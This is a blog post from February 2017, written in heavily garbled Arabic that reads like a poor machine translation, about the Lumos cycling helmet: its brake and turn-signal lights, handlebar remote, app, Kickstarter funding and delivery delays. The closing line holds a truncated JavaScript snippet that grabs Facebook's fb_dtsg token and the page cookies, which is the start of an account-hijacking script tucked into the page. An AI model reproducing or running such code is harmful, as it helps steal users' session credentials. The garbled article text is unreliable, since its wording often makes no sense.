vendredi 17 février 2017

خوذة الدراجة مع أضواء إشارة بدوره جعل ركوب الخيل أكثر أمنا كله

السيارات قد أضواء مؤشر لسلامة أفضل - لذلك لماذا لا الدراجات أيضا؟
خوذة Lumos هي خوذة لراكبي الدراجات مع بارز الضوء الأحمر الفرامل، وكذلك الصفراء بدوره اشارات اليسار واليمين، مثل ما كنت انظر على المركبات الآلية.
التي أنشأتها جيف وتشن دينغ الاتحاد الأوروبي، ون جيا باو، وLumos حاليا الحصول على بنيت بعد حملة كيك ستارتر الناجحة التي أثارت $ 800،000 في يوليو تموز الماضي.
        يتم التحكم في خوذة من خلال جهاز تحكم عن بعد لاسلكي صغير لك مقطع على المقود.


via GIPHY



via GIPHY

يحتوي جهاز التحكم عن بعد أيضا التسارع الذي يقوم بتشغيل أضواء الفرامل عندما يكشف تباطؤ سريع:

كما يأتي خوذة مع التطبيق دائرة الرقابة الداخلية، التي تراقب كل من مستوى البطارية وجهاز التحكم عن بعد، وويخطر لك إذا كنت بحاجة لشحن خوذة. وقالت الشركة نسخة الروبوت هو في الأشغال.


خوذة لتجارة التجزئة 169 $.

وقال دينغ انها بدأت كمشروع الجانب لاثنين، الذين كانوا في جامعة هارفارد كما طالب الهندسة. وأضاف "كنا مجرد ترقيع على جعل الجانب شيء كنا نظن كان باردا، وكنا فقط مما يجعلها لأنفسنا.

"إلا بعد مئات من الناس حرفيا أبلغتنا أنها ستشتري واحد إذا قمنا فعلت نبدأ النظر في الامر على محمل الجد".

ولكن مثل كثير من مشروع كيك ستارتر، وكان تسليم المنتجات إلى يتأخر.

وأوضح دينغ أن الشركة لم يكون لديك منتج جاهز في جدول زمني وعدت، ولكن أشار ردود الفعل من اختبار بيتا أن الشركة بحاجة إلى العمل على صالح وخوذة، وأجزاء تكرير تصميمه مستحضرات التجميل.

كان لديهم أيضا لتحسين حساسية التسارع بحيث أنه لن يؤدي زورا أضواء الفرامل.

"كانت هناك فقط الكثير من الأشياء الصغيرة التي وضعت معا يتكون المنتج تبدو غير المكتمل للغاية".

وفي المستقبل، يمكن أن Lumos العمل في تعقب مطية لإضافة بيانات النشاط إلى تطبيقات تجريب. وأشار دينغ أن البيانات المجمعة ركوب يمكن حتى تذهب أبعد من ذلك في مساعدة المدن والمجتمعات الدراجات خطة أفضل الطرق.


email

ssdfqsdfcd@gmail.com (function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(docume...